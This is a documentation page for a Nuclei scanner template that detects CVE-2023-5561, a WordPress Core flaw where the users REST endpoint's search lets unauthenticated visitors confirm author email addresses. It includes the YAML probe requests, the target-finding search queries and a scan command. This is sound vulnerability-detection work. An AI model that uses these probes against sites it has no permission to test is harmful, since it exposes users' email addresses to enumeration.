WordPress Core - Post Author Email Disclosure
ID: CVE-2023-5561
Severity: medium
Author: nqdung2002
Tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure
Description
Section titled “Description”WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the ‘list_users’ capability, the search is applied to the user_email column.
YAML Source
Section titled “YAML Source”id: CVE-2023-5561
info: name: WordPress Core - Post Author Email Disclosure author: nqdung2002 severity: medium description: | WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column. impact: | This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/ - https://nvd.nist.gov/vuln/detail/CVE-2023-5561 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-5561 cwe-id: CWE-200 epss-score: 0.00072 epss-percentile: 0.32109 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: wordpress product: wordpress framework: wordpress shodan-query: - cpe:"cpe:2.3:a:wordpress:wordpress" - http.component:"wordpress" fofa-query: body="oembed" && body="wp-" tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins")' internal: true
- method: GET path: - "{{BaseURL}}/{{route}}search=@"
stop-at-first-match: true payloads: route: - "wp-json/wp/v2/users?" - "?rest_route=/wp/v2/users&" attack: clusterbomb
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "[{\"id", "name\":", "@")' condition: and# digest: 4b0a00483046022100925cdafa52890465362ddbe743a73ae30bb25f284a4c581867e0b50a1f674dcf022100a77201308db43b02266252fc853c6f288c5d83b0c63a6387677ce4aa673237b0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5561.yaml"